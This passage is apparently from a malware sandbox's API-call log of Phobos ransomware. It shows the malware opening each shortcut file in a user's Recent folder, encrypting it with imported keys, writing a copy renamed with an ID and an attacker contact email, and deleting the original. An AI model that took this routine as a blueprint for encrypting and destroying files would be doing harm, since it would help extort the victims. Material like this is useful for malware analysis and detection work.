lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.171] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.177] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.178] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.178] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.178] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x52a, lpOverlapped=0x0) returned 1 [0201.179] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x530, dwBufLen=0x530 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x530) returned 1 [0201.179] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x530, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x530, lpOverlapped=0x0) returned 1 [0201.180] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa328e8) returned 1 [0201.180] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.180] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.180] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.180] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.180] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.180] CloseHandle (hObject=0x174) returned 1 [0201.180] CloseHandle (hObject=0x160) returned 1 [0201.180] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Music.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my music.lnk")) returned 1 [0201.181] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.183] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1359) returned 1 [0201.183] CloseHandle (hObject=0x160) returned 1 [0201.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk")) returned 0x20 [0201.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.183] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.183] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.184] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.184] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.184] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x54f, lpOverlapped=0x0) returned 1 [0201.267] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550, dwBufLen=0x550 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x550) returned 1 [0201.268] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x550, lpOverlapped=0x0) returned 1 [0201.268] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.268] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.268] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.268] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.268] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.269] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.269] CloseHandle (hObject=0x160) returned 1 [0201.269] CloseHandle (hObject=0x174) returned 1 [0201.269] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\My Pictures.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\my pictures.lnk")) returned 1 [0201.269] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qoVReCrCc_DdexZ1uF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qovrecrcc_ddexz1uf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.270] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=3978) returned 1 [0201.270] CloseHandle (hObject=0x174) returned 1 [0201.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qoVReCrCc_DdexZ1uF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qovrecrcc_ddexz1uf.lnk")) returned 0x20 [0201.270] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qoVReCrCc_DdexZ1uF.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qovrecrcc_ddexz1uf.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qoVReCrCc_DdexZ1uF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qovrecrcc_ddexz1uf.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.270] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.270] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.270] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qoVReCrCc_DdexZ1uF.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qovrecrcc_ddexz1uf.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.271] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.271] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.271] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0xf8a, lpOverlapped=0x0) returned 1 [0201.272] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf90, dwBufLen=0xf90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0xf90) returned 1 [0201.272] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf90, lpOverlapped=0x0) returned 1 [0201.273] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.273] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.273] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.273] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.273] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.273] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.273] CloseHandle (hObject=0x174) returned 1 [0201.273] CloseHandle (hObject=0x160) returned 1 [0201.273] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qoVReCrCc_DdexZ1uF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qovrecrcc_ddexz1uf.lnk")) returned 1 [0201.274] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qq3rksI.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qq3rksi.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.275] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1000) returned 1 [0201.275] CloseHandle (hObject=0x160) returned 1 [0201.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qq3rksI.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qq3rksi.lnk")) returned 0x20 [0201.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qq3rksI.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qq3rksi.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qq3rksI.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qq3rksi.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.275] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.275] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qq3rksI.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qq3rksi.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.276] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.276] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.276] ReadFile (in: hFile=0x160, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3e8, lpOverlapped=0x0) returned 1 [0201.279] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3f0, dwBufLen=0x3f0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3f0) returned 1 [0201.279] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3f0, lpOverlapped=0x0) returned 1 [0201.280] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.280] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.280] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0201.280] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.280] WriteFile (in: hFile=0x174, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0201.280] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.280] CloseHandle (hObject=0x160) returned 1 [0201.280] CloseHandle (hObject=0x174) returned 1 [0201.280] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\qq3rksI.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\qq3rksi.lnk")) returned 1 [0201.281] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ReVcwkpnizb6rUIU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\revcwkpnizb6ruiu.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.282] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=609) returned 1 [0201.282] CloseHandle (hObject=0x174) returned 1 [0201.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ReVcwkpnizb6rUIU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\revcwkpnizb6ruiu.lnk")) returned 0x20 [0201.282] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ReVcwkpnizb6rUIU.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\revcwkpnizb6ruiu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ReVcwkpnizb6rUIU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\revcwkpnizb6ruiu.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0201.282] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.282] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0201.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ReVcwkpnizb6rUIU.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\revcwkpnizb6ruiu.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.283] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0201.283] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.283] ReadFile (in: hFile=0x174, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x261, lpOverlapped=0x0) returned 1 [0201.285] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x270, dwBufLen=0x270 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x270) returned 1 [0201.285] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x270, lpOverlapped=0x0) returned 1 [0201.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32868) returned 1 [0201.285] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0201.285] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0201.286] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.286] WriteFile (in: hFile=0x160, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0201.286] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.286] CloseHandle (hObject=0x174) returned 1 [0201.286] CloseHandle (hObject=0x160) returned 1 [0201.286] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ReVcwkpnizb6rUIU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\revcwkpnizb6ruiu.lnk")) returned 1 [0201.287] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0201.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.288] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=771) returned 1 [0201.288] CloseHandle (hObject=0x160) returned 1 [0201.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk")) returned 0x20 [0201.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0201.288] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: 